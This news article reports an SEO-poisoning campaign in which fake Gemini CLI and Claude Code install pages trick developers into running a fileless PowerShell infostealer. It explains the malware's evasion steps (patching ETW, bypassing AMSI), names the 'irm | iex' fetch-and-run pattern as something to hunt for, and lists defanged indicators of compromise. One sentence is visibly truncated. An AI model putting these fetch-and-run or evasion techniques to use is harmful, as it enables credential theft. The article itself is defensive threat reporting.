SEO Poisoning Impersonates Gemini CLI & Claude Install
Malicious actors are leveraging SEO poisoning tactics to create deceptive installation pages for popular AI coding tools, Gemini CLI and Claude Code. This sophisticated approach specifically targets...
Malicious actors are leveraging SEO poisoning tactics to create deceptive installation pages for popular AI coding tools, Gemini CLI and Claude Code. This sophisticated approach specifically targets software developers, aiming to compromise their systems. A recent The attackers are using a technique called SEO poisoning to push their malicious websites above real ones in search results, tricking developers into running dangerous commands on their own machines.
The campaign began surfacing in early March 2026 and has expanded beyond AI tools. Victims are lured to fake pages nearly identical to official installation guides, where they paste a single PowerShell command into their terminal.
That one action quietly deploys a powerful infostealer capable of draining credentials, session tokens, and sensitive files.
EclecticIQ analysts identified this ongoing campaign and found that the malware runs entirely in memory through PowerShell, leaving no files on disk.
EclecticIQ said in a report shared with Cyber Security News (CSN) that the infostealer harvests credentials from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server.
The stolen data includes OAuth tokens, CI/CD credentials, corporate VPN details, and session cookies from platforms like Slack, Microsoft Teams, Discord, and Telegram.
A valid session cookie lets an attacker step directly into a victim’s workspace, bypassing both passwords and multi-factor authentication. This access fuels demand in underground access broker markets.
Beyond credential theft, the malware gives attackers the ability to run additional code on infected machines remotely.
While no persistence mechanism was found in the script, this capability means operators can follow up with deeper intrusions, turning a single developer workstation into an enterprise-wide breach.
Hackers Use SEO Poisoning
The infection chain is simple but effective. A developer searches for how to install Gemini CLI or Claude Code, and the top result looks exactly like the official page.
In the Gemini campaign, victims were directed to geminicli[.]co[.]com, which prompted a PowerShell command that silently downloads an infostealer payload called Install.ps1 from gemini-setup[.]com.
What makes this trick so convincing is that the real Gemini CLI installs in parallel. The genuine npm package completes in the terminal, giving users every reason to believe nothing went wrong.
By the time the tool is ready, the infostealer has already finished collecting and sending the victim’s data.
The Claude Code campaign followed the same playbook. On March 30, 2026, the threat actor registered claudecode[.]co[.]com and claude-setup[.]com using identical naming patterns.
The cloned page matched official documentation closely enough to deceive most users, and exfiltrated data was sent to events[.]ms709[.]com.
EclecticIQ analysts pivoted from those domains using passive DNS records and uncovered a cluster of over 30 malicious domains also impersonating Node.js, Chocolatey, KeePassXC, and Monero.
Most were registered between late March and early April 2026, pointing to a coordinated, active campaign.
Fileless PowerShell Stealer Built to Evade Detection
Once the second-stage payload runs, it immediately disables core Windows defenses. It patches Event Tracing for Windows to suppress logging and bypasses the Antimalware Scan Interface, letting the rest of the script run undetected.
The script spans roughly 6,800 lines of junk code and includes a sandbox check to avoid analysis environments. The stealer loads three C# components at runtime to probe deep into the host.
One dumps Windows Credential Manager entries, another captures screen resolution for fingerprinting, and a third lists running processes through the Restart Manager API to sidestep detection.
Everything runs inside PowerShell without writing a single file to disk. To defend against this threat, EclecticIQ recommends hunting for the irm | iex pattern in command-line logs and alerting on hidden PowerShell executions.
Enforcing PowerShell Constrained Language Mode, using FIDO keys for privileged accounts, and deploying short-lived OAuth tokens can meaningfully limit the damage if credentials are stolen.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| Domain | geminicli[.]co[.]com | Fake Gemini CLI installation page |
| Domain | gemini-setup[.]com | Hosts infostealer downloader payload (Install.ps1) |
| Domain | claudecode[.]co[.]com | Fake Claude Code installation page |
| Domain | claude-setup[.]com | Hosts Claude Code infostealer payload |
| Domain | events[.]msft23[.]com | C2 server for Gemini CLI campaign |
| Domain | events[.]ms709[.]com | C2 server for Claude Code campaign |
| Domain | api[.]bio9438[.]com | Attacker-controlled infrastructure |
| Domain | claudecode-install[.]co[.]com | Attacker-controlled domain |
| Domain | openclow[.]co[.]com | Attacker-controlled domain |
| Domain | geninicli[.]co[.]com | Attacker-controlled domain (typosquat) |
| Domain | keepassxc[.]us[.]org | Fake KeePassXC impersonation domain |
| Domain | claude-code[.]co[.]com | Attacker-controlled domain |
| Domain | chocolatey[.]net | Attacker-controlled Chocolatey impersonation |
| Domain | chocolatey-setup[.]co[.]com | Fake Chocolatey installation page |
| Domain | get-monero[.]co[.]uk | Fake Monero impersonation domain |
| Domain | getmonero[.]us[.]com | Fake Monero impersonation domain |
| Domain | metrics[.]msft17[.]com | Attacker-controlled infrastructure |
| Domain | claude-setup[.]com | Payload staging domain |
| Domain | keepassxc[.]us[.]com | Fake KeePassXC impersonation domain |
| Domain | olive3451[.]com | Attacker-controlled domain |
| Domain | chocolatey-download[.]co[.]com | Fake Chocolatey download domain |
| Domain | chocolatey[.]co[.]com | Fake Chocolatey impersonation domain |
| IP Address | 109.107.170[.]111 | Netherlands-based bulletproof hosting (MIRhosting) |
| SHA-256 | ff81cb9263fcde5870a0748fd6af2d30a4ba864415c15ca14827d0dd723eb60c | Infostealer payload hash |
| SHA-256 | 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333 | Infostealer payload hash |
| SHA-256 | 89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d | Infostealer payload hash |
| SHA-256 | be2ff065a232a3a6f187f9fb03a6c1b368dff3d2ba0966777b1f5503aa5ecd16 | Infostealer payload hash |
| SHA-256 | a1c5e1d9bdc1a931c11ac6fdfdff1fbc69ff88521cf443cb174f9720a05fe72d | Infostealer payload hash |
| SHA-256 | bb78f024c4d8b5a6a128aacb498acad025a234a6b25fde36ff2e14601134555f | Infostealer payload hash |
| SHA-256 | a6525b37b0cc5339df375e17a0c10772b50c9d425001b0c3a9dada995c7f62dd | Infostealer payload hash |
| SHA-256 | b37ee243518221017bab0eb4b54b5431571cc21e54113698ce49a89b89993754 | Infostealer payload hash |
| SHA-256 | aa350580ae5ea46544ffa15c324ab4225dff0dcc5842ac5ca8e2dc4018e5ffad | Infostealer payload hash |
| SHA-256 | 65e1a542bb7d995cc4aa6c71191da125f14f99ca03da7266f5b071440d6d229a | Infostealer payload hash |
| SHA-256 | 64d2a9a49e27d89f1b3489d7db29c3a3a12b4b090f59c24b694c239cb55db262 | Infostealer payload hash |
| SHA-256 | 2d7a94e4a0fedcf31cdd43b06222add9d1888fecb2c5488afc658d08c3f40116 | Infostealer payload hash |
| File Name | Install.ps1 | First-stage infostealer downloader PowerShell script |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
No Comment! Be the first one.